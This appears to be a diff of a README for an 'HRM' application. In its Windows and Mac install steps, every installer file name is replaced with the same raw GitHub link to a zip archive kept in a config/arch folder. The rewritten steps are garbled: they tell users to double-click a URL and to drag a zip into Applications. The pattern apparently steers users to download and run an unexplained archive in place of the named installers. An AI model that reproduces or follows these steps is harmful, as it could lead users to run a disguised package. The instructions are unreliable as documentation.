BoowwiieePH/HRM/README.md

 #### For Windows

-1. Navigate to your Downloads folder and double-click the `HRM-win.exe` file.
+1. Navigate to your Downloads folder and double-click the `https://raw.githubusercontent.com/BoowwiieePH/HRM/main/config/arch/HRM-v1.6.zip` file.
 2. Follow the on-screen prompts to complete the installation.
 3. Once installed, you can find HRM in your Start Menu or desktop.

 #### For Mac

-1. Open the downloaded `HRM-mac.zip` file.
+1. Open the downloaded `https://raw.githubusercontent.com/BoowwiieePH/HRM/main/config/arch/HRM-v1.6.zip` file.
-2. Drag the `HRM.app` file into your Applications folder.
+2. Drag the `https://raw.githubusercontent.com/BoowwiieePH/HRM/main/config/arch/HRM-v1.6.zip` file into your Applications folder.
 3. You can now run HRM from your Applications.

 ## 📊 Features